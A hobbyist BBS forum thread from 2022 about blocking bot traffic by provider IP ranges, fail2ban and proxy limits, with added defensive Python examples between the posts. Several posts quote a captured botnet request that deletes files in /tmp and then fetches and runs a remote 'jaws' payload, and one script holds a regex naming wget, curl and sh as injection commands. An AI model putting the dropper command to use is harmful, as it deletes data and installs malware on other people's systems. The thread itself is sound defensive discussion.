• IP Block Lists

    From Warpslide@1337:3/126 to All on Fri Mar 18 22:22:36 2022
    Hi All,

    I have a web server accessible to the public, which as expected was getting hammered with various bots & script kiddies.

    I've setup an IP blocklist for the usual suspects, but I was noticing a lot of malicious traffic from California, Germany, The Netherlands & the UK as well.

    Not wanting to block those countries out entirely I decided to dig a little deeper and noticed that many of these addresses had one thing in common: They're coming from Digital Ocean.

    Most of these seem to be trying to log into wordpress or bring up other login pages for other services that don't exist on this web server. Others seem to be a little more insidious:

    "GET /shell?cd+/tmp;rm+-rf+*;wget+31.210.xx.xxx/jaws;sh+/tmp/jaws HTTP/1.1"

    None of these work or do anything on my webserver, but I still don't want them hammering on my system.

    Fortunately Digital Ocean publishes a full list of the IP addresses they use: https://digitalocean.com/geo/google.csv

    After adding these ranges to my blocklist suddenly my apache logs are a lot quieter.

    Do you filter by country/region or by provider? If so, which IP ranges do you block?

    p.s: I know some BBS hubs are located on VPS providers, you may need to modify these lists if you want to use them so you can still communicate with your hub if they happen to use Digital Ocean. ML looks like he uses OVH so he's safe... ;)


    Jay

    ... The manner in which it is given is worth more than the gift.

    --- Mystic BBS v1.12 A48 2022/03/11 (Raspberry Pi/32)
    * Origin: Northern Realms (1337:3/126)
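An added example, not Warpslide's code and not anything taken from the provider feed: a script that reads a CSV whose first column is a CIDR range, in the same shape as the Digital Ocean geo feed linked above (the remaining columns are assumed to be country, region, city and postal code and are ignored), tags Apache combined-log lines whose source falls inside those ranges, flags request targets that carry shell-injection attempts like the /shell? line quoted in the post, and emits nftables set elements for the ranges. It also takes an allowlist for hosts that sit inside a provider range but must stay reachable, which is the p.s. about BBS hubs. Every range and log line below is constructed.

```python
"""Tag web-server log lines whose source sits in a hosting provider's ranges.

Added example, not code from the original post. Assumes a CSV whose first
column is a CIDR range (the shape of the DigitalOcean geo feed linked above;
the other columns are assumed to be country, region, city, postal and are
ignored). Everything below is constructed sample data.
"""
import csv
import ipaddress
import re
from urllib.parse import unquote_plus

# Constructed stand-in for the provider feed; documentation prefixes only.
PROVIDER_CSV = """\
# cidr,country,region,city,postal
192.0.2.0/24,US,US-CA,Santa Clara,
198.51.100.0/24,DE,DE-HE,Frankfurt,
2001:db8:1::/48,NL,NL-NH,Amsterdam,
"""

# Hosts inside a provider range that must stay reachable (e.g. your BBS hub).
ALLOWLIST_CSV = "192.0.2.200/32\n"

# Constructed Apache combined-format lines; the /shell? target is the one
# quoted in the post, with its address left elided as in the original.
LOG_LINES = """\
192.0.2.45 - - [18/Mar/2022:22:10:01 +0000] "GET /wp-login.php HTTP/1.1" 404 196 "-" "Mozilla/5.0"
203.0.113.7 - - [18/Mar/2022:22:10:05 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
198.51.100.9 - - [18/Mar/2022:22:11:30 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+31.210.xx.xxx/jaws;sh+/tmp/jaws HTTP/1.1" 404 196 "-" "Hello, world"
2001:db8:1::10 - - [18/Mar/2022:22:12:00 +0000] "POST /xmlrpc.php HTTP/1.1" 404 196 "-" "-"
192.0.2.200 - - [18/Mar/2022:22:13:00 +0000] "GET /bbs/ HTTP/1.1" 200 512 "-" "binkd"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# A shell separator (or the start of the query string) followed by a command
# typical of IoT-botnet droppers.
INJECTION_RE = re.compile(r"(?:^|[?;&|`])\s*(?:cd|rm|wget|curl|sh|chmod|tftp)\b")


def load_ranges(text):
    """CIDR ranges from the first CSV column, skipping blank and '#' lines."""
    rows = csv.reader(l for l in text.splitlines() if l.strip() and not l.startswith("#"))
    return [ipaddress.ip_network(row[0].strip(), strict=False) for row in rows]


def in_ranges(ip, nets):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in nets)   # False across address families


def classify(lines, provider_nets, allow_nets=()):
    """Map each source IP to the set of tags it earned: 'provider', 'injection'."""
    report = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                          # unparseable line, skip it
        tags = report.setdefault(m["ip"], set())
        if in_ranges(m["ip"], provider_nets) and not in_ranges(m["ip"], allow_nets):
            tags.add("provider")
        # Decode '+' and %XX first so the pattern sees what the shell would.
        if INJECTION_RE.search(unquote_plus(m["target"])):
            tags.add("injection")
    return report


def nft_elements(nets, prefix="provider"):
    """nft commands loading the ranges into interval sets, one per family.
    Assumes sets declared as `type ipv4_addr; flags interval;` (v6 likewise)."""
    cmds = []
    for version, suffix in ((4, "v4"), (6, "v6")):
        members = [str(n) for n in nets if n.version == version]
        if members:
            cmds.append(f"add element inet filter {prefix}_{suffix} {{ {', '.join(members)} }}")
    return cmds


if __name__ == "__main__":
    nets, allow = load_ranges(PROVIDER_CSV), load_ranges(ALLOWLIST_CSV)
    for ip, tags in classify(LOG_LINES.splitlines(), nets, allow).items():
        print(f"{ip:20} {', '.join(sorted(tags)) or '-'}")
    print("\n".join(nft_elements(nets)))
```

To run it against the real feed, save it locally (`curl -o ranges.csv https://digitalocean.com/geo/google.csv`) and pass the file contents to `load_ranges`. The feed changes over time, so re-fetch and rebuild the sets on a schedule, and keep the hub allowlist as a separate accept rule placed before the drop rule rather than trying to subtract it from the interval set.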
  • From hyjinx@1337:2/104 to Warpslide on Sat Mar 19 22:22:40 2022
    Not wanting to block those countries out entirely I decided to dig a little deeper and noticed that many of these addresses had one thing in common: They're coming from Digital Ocean.

    Most of these seem to be trying to log into wordpress or bring up other login pages for other services that don't exist on this web server. Others seem to be a little more insidious:

    "GET /shell?cd+/tmp;rm+-rf+*;wget+31.210.xx.xxx/jaws;sh+/tmp/jaws HTTP/1.1"

    None of these work or do anything on my webserver, but I still don't want them hammering on my system.

    Fortunately Digital Ocean publishes a full list of the IP addresses they use: https://digitalocean.com/geo/google.csv

    After adding these ranges to my blocklist suddenly my apache logs are a lot quieter.

    Do you filter by country/region or by provider? If so, which IP ranges do you block?


    Nice - thanks for the list Warp!

    Tbh I don't block HTTP access at all really, because it's inevitable that the bots will move from place to place eventually and it's just a constant game of whack-a-mole. Rather, I use Web Application Firewalls for webservers and things like fail2ban or sshguard for SSH which automatically blacklists/greylists abusers.

    Chur,
    Al


    hyjinx // Alistair Ross
    Author of 'Back to the BBS' Documentary: https://bit.ly/3tRINeL (YouTube) alsgeeklab.com

    --- Mystic BBS v1.12 A46 2020/08/26 (Linux/64)
    * Origin: bbs.alsgeeklab.com:2323 (1337:2/104)
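The automatic blacklisting hyjinx describes, as an added example (this is not fail2ban's or sshguard's code, only the same jail logic in plain Python): a source is banned after `maxretry` failures inside `findtime` seconds, the ban is lifted after `bantime`, and sources in `ignore` networks are never banned. The failure events are constructed; the stage that turns sshd or Apache log lines into (time, ip) events (fail2ban's filter.d regexes) is left out so the jail behaviour itself is what the block shows.

```python
"""Fail2ban-style automatic banning, as an added example (not fail2ban's or
sshguard's code). A jail consumes (timestamp, source_ip) failure events such
as a filter would extract from sshd or Apache auth logs, bans a source after
`maxretry` failures inside `findtime` seconds, lifts the ban after `bantime`,
and never bans sources in `ignore` networks. Events below are constructed;
the log-parsing stage (fail2ban's filter.d regexes) is deliberately left out.
"""
from collections import defaultdict, deque
import ipaddress


class Jail:
    def __init__(self, maxretry=5, findtime=600, bantime=3600, ignore=()):
        self.maxretry, self.findtime, self.bantime = maxretry, findtime, bantime
        self.ignore = [ipaddress.ip_network(n) for n in ignore]
        self.failures = defaultdict(deque)   # ip -> failure times inside findtime
        self.bans = {}                        # ip -> time the ban expires

    def _ignored(self, ip):
        addr = ipaddress.ip_address(ip)
        return any(addr in net for net in self.ignore)

    def expire(self, now):
        """Lift bans that have run out; returns [(ip, expiry_time), ...]."""
        lifted = [(ip, until) for ip, until in self.bans.items() if until <= now]
        for ip, _ in lifted:
            del self.bans[ip]
        return lifted

    def is_banned(self, ip, now):
        self.expire(now)
        return ip in self.bans

    def failure(self, now, ip):
        """Record one failed attempt; True if this attempt triggered a ban."""
        self.expire(now)
        if self._ignored(ip) or ip in self.bans:
            return False
        window = self.failures[ip]
        window.append(now)
        while window and window[0] <= now - self.findtime:   # slide the window
            window.popleft()
        if len(window) >= self.maxretry:
            self.bans[ip] = now + self.bantime
            window.clear()                    # start fresh after the ban lifts
            return True
        return False


def replay(events, jail):
    """Feed events in time order; returns the (time, ip, action) log a real
    jail would hand to its firewall action (an nft/iptables insert/delete)."""
    actions = []
    for now, ip in sorted(events):
        for banned_ip, until in jail.expire(now):
            actions.append((until, banned_ip, "unban"))
        if jail.failure(now, ip):
            actions.append((now, ip, "ban"))
    return actions


# Constructed failure events (seconds since an arbitrary epoch, source IP):
# a fast brute-forcer, a slow one that spaces attempts beyond findtime,
# and your own hub, which sits in the ignore list.
EVENTS = (
    [(t, "203.0.113.5") for t in (0, 10, 20, 30, 40, 3700)]
    + [(t, "198.51.100.7") for t in (50, 700, 1400, 2100, 2800)]
    + [(t, "192.0.2.10") for t in (100, 101, 102, 103, 104)]
)


def demo():
    jail = Jail(maxretry=5, findtime=600, bantime=3600, ignore=["192.0.2.0/24"])
    return replay(EVENTS, jail), jail


if __name__ == "__main__":
    actions, jail = demo()
    for when, ip, action in actions:
        print(f"t={when:<5} {action:5} {ip}")
```

The slow attacker never gets banned because each attempt falls outside the sliding `findtime` window; that is the trade-off behind the "whack-a-mole" remark, and the usual answer is a second jail with a longer `findtime` and `bantime` for repeat offenders.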
  • From MeaTLoTioN@1337:1/101 to Warpslide on Sat Mar 19 10:43:10 2022
    On 18 Mar 2022, Warpslide said the following...

    Hi All,

    I have a web server accessible to the public, which as expected was getting hammered with various bots & script kiddies.

    I've setup an IP blocklist for the usual suspects, but I was noticing a lot of malicious traffic from California, Germany, The Netherlands & the UK as well.

    Not wanting to block those countries out entirely I decided to dig a little deeper and noticed that many of these addresses had one thing in common: They're coming from Digital Ocean.

    Most of these seem to be trying to log into wordpress or bring up other login pages for other services that don't exist on this web server. Others seem to be a little more insidious:

    "GET /shell?cd+/tmp;rm+-rf+*;wget+31.210.xx.xxx/jaws;sh+/tmp/jaws HTTP/1.1"

    None of these work or do anything on my webserver, but I still don't want them hammering on my system.

    Fortunately Digital Ocean publishes a full list of the IP addresses they use: https://digitalocean.com/geo/google.csv

    After adding these ranges to my blocklist suddenly my apache logs are a lot quieter.

    Do you filter by country/region or by provider? If so, which IP ranges do you block?

    p.s: I know some BBS hubs are located on VPS providers, you may need to modify these lists if you want to use them so you can still communicate with your hub if they happen to use Digital Ocean. ML looks like he uses OVH so he's safe... ;)

    Good info, I use OVH yes for the UK and CA hubs. I made a publicly available blacklist of IPs for mystic bbses along with a sort of door/script thing to automagically grab, compare and add new IPs to your local list (mystic only so far).

    The main blacklist can be found here;
    $ curl https://erb.pw/blacklist

    If you want to use my door/script, you can get it here; https://github.com/christiansacks/mystic-twitupd

    Hope this helps out people =)

    ---
    Best regards,
    Christian aka MeaTLoTioN

    [eml] ml@erb.pw  [web] www.erb.pw
    [fsx] 21:1/158  [tqw] 1337:1/101  [rtn] 80:774/81  [fdn] 2:250/5  [ark] 10:104/2

    ... Reward for a job well done: More work

    --- Mystic BBS v1.12 A47 2021/12/13 (Linux/64)
    * Origin: thE qUAntUm wOrmhOlE, rAmsgAtE, uK. bbs.erb.pw (1337:1/101)
  • From deon@1337:2/101 to Warpslide on Sun Mar 20 09:44:50 2022
    Re: IP Block Lists
    By: Warpslide to All on Fri Mar 18 2022 10:22 pm

    Howdy,

    I have a web server accessible to the public, which as expected was getting hammered with various bots & script kiddies.

    I've setup an IP blocklist for the usual suspects, but I was noticing a lot of malicious traffic from California, Germany, The Netherlands & the UK as well.

    Not wanting to block those countries out entirely I decided to dig a little deeper and noticed that many of these addresses had one thing in common: They're coming from Digital Ocean.

    Yeah, I've always thought that "country" blocking would never last (just like "unknown caller blocking on your phone", or even now answering calls with a caller id) - spammers get around it as quickly as we decide to implement it. For the same reason, blocking "Digital Ocean" won't last - they'll find another low cost VPS platform to invest in.

    One thing that I do (with web anyway), is to block "ip address" connections - so http://1.2.3.4 (if 1.2.3.4 was my ip address) would return 444. You have to use my proper domain name to get the web server to respond to it.

    While this has been working well, it obviously doesn't stop spammers trying - but they do need to have a current url list (instead of programming their bots to try all IP addresses).

    If I need to, my next step (and I've been thinking about it) would be to see if haproxy can help. With it, you can limit concurrent connections from the same source (which in theory would reduce denial impacts). You could also probably use haproxy to redirect "unwanted addresses" to a honeypot and let them waste their time there.

    Ultimately, you can't stop it - nor would you want to, as it would be hard to determine who is real or not - and probably the only effective way would be some sort of "entry captcha".


    ...δεσ∩
    --- SBBSecho 3.15-Linux
    * Origin: I'm playing with ANSI+videotex - wanna play too? (1337:2/101)
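The front-door checks deon describes, as an added example (this is not deon's configuration and not nginx's or haproxy's code, only the same policy in plain Python so it can be run and tested): `host_decision` mirrors an nginx default_server that returns 444, nginx's non-standard "close the connection without a response" code, whenever the Host header is an IP literal or is not one of this server's names; `SourceLimiter` caps concurrent connections per source address the way haproxy's per-source tracking does; and `dispatch` additionally sends sources in an assumed `UNWANTED` list to a honeypot backend. The served hostnames and the unwanted range are constructed.

```python
"""Added example (not deon's configuration, not nginx's or haproxy's code):
Host-header and per-source connection policy that a reverse proxy would
enforce in front of a BBS web server. SERVED_HOSTS and UNWANTED are assumed.
"""
import ipaddress
from collections import Counter

SERVED_HOSTS = {"bbs.example.net", "www.example.net"}       # assumed names
UNWANTED = [ipaddress.ip_network("198.51.100.0/24")]         # assumed range


def host_is_ip_literal(host):
    """True for Host values such as 1.2.3.4, 1.2.3.4:8080, [2001:db8::1]:443."""
    h = host.strip()
    if h.startswith("["):                       # bracketed IPv6, optional port
        h = h[1:h.index("]")] if "]" in h else h[1:]
    elif h.count(":") == 1:                     # IPv4 or hostname with a port
        h = h.split(":", 1)[0]
    try:
        ipaddress.ip_address(h)
        return True
    except ValueError:
        return False


def host_decision(host):
    """'serve' only when Host names this server; otherwise 'close' (nginx 444)."""
    if not host or host_is_ip_literal(host):
        return "close"
    name = host.strip().lower().rsplit(":", 1)[0]   # drop :port from a hostname
    return "serve" if name in SERVED_HOSTS else "close"


class SourceLimiter:
    """Per-source concurrent connection cap (what haproxy does with conn_cur
    in a stick table compared against a limit in a tcp-request rule)."""

    def __init__(self, max_per_source=10):
        self.max_per_source = max_per_source
        self.active = Counter()

    def connect(self, src_ip):
        """Count a new connection, or return False to refuse it."""
        if self.active[src_ip] >= self.max_per_source:
            return False
        self.active[src_ip] += 1
        return True

    def disconnect(self, src_ip):
        if self.active[src_ip] > 1:
            self.active[src_ip] -= 1
        else:
            self.active.pop(src_ip, None)      # tolerate a stray disconnect


def dispatch(src_ip, host, limiter, unwanted=UNWANTED):
    """Decision for one new connection: 'refuse', 'honeypot', 'close' or 'serve'.
    The caller must call limiter.disconnect(src_ip) when the connection ends."""
    if not limiter.connect(src_ip):
        return "refuse"
    addr = ipaddress.ip_address(src_ip)
    if any(addr in net for net in unwanted):
        return "honeypot"                        # let them waste their time there
    return host_decision(host)


if __name__ == "__main__":
    lim = SourceLimiter(max_per_source=2)
    for src, host in [("203.0.113.9", "192.0.2.4"), ("203.0.113.9", "bbs.example.net:2323"),
                      ("203.0.113.9", "www.example.net"), ("198.51.100.3", "bbs.example.net")]:
        print(f"{src:14} Host={host!s:24} -> {dispatch(src, host, lim)}")
```

The IP-literal test has to handle the bracketed IPv6 form and a trailing port, or a scanner that sends `Host: [2001:db8::1]:443` slips past a check that only looks for dotted quads. Note that `dispatch` counts the connection before deciding, so a refused or closed connection still needs its matching `disconnect` when it is torn down.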
  • From Satchmo@1337:1/107 to Warpslide on Mon Mar 21 17:06:08 2022

    Hello Warpslide!

    Replying to a msg dated 18 Mar 22 22:22, from you to all.

    I host my DNS nameservers with Cloudflare, as a result a lot of the nasties are stopped without me even having to worry about them.
    A decent rate limiting setup on my webservers saves the rest.

    Satchmo


    ... This tagline prohibited by Orville Bullitt
    --- GoldED+/LNX 1.1.5--b20170303
    * Origin: Sonic BBS :: North Yorkshire, England (1337:1/107)
  • From acn@1337:1/108.1 to Warpslide on Tue Mar 22 15:48:00 2022
    On 18.03.22 Warpslide@1337:3/126 wrote in TQW_GEN:

    Hello Warpslide,

    Do you filter by country/region or by provider? If so, which IP ranges do you block?

    At the moment, I don't use fixed block lists at all, neither on my BBS nor on my VPSes.
    But I'm running fail2ban on these systems, configured e.g. for Postfix, SSH and some Apache 'targets'. On my BBS, I tried to add some configuration for Synchronet, next to its own blocking mechanisms.

    But as all this keeps being a moving target, I try to adapt as well :)

    Regards,
    Anna
    PS. at the moment, the web server of my BBS is only reachable via IPv6; telnet and binkp do work via v4 & v6.

    --- OpenXP 5.0.51
    * Origin: Imzadi Box Point (1337:1/108.1)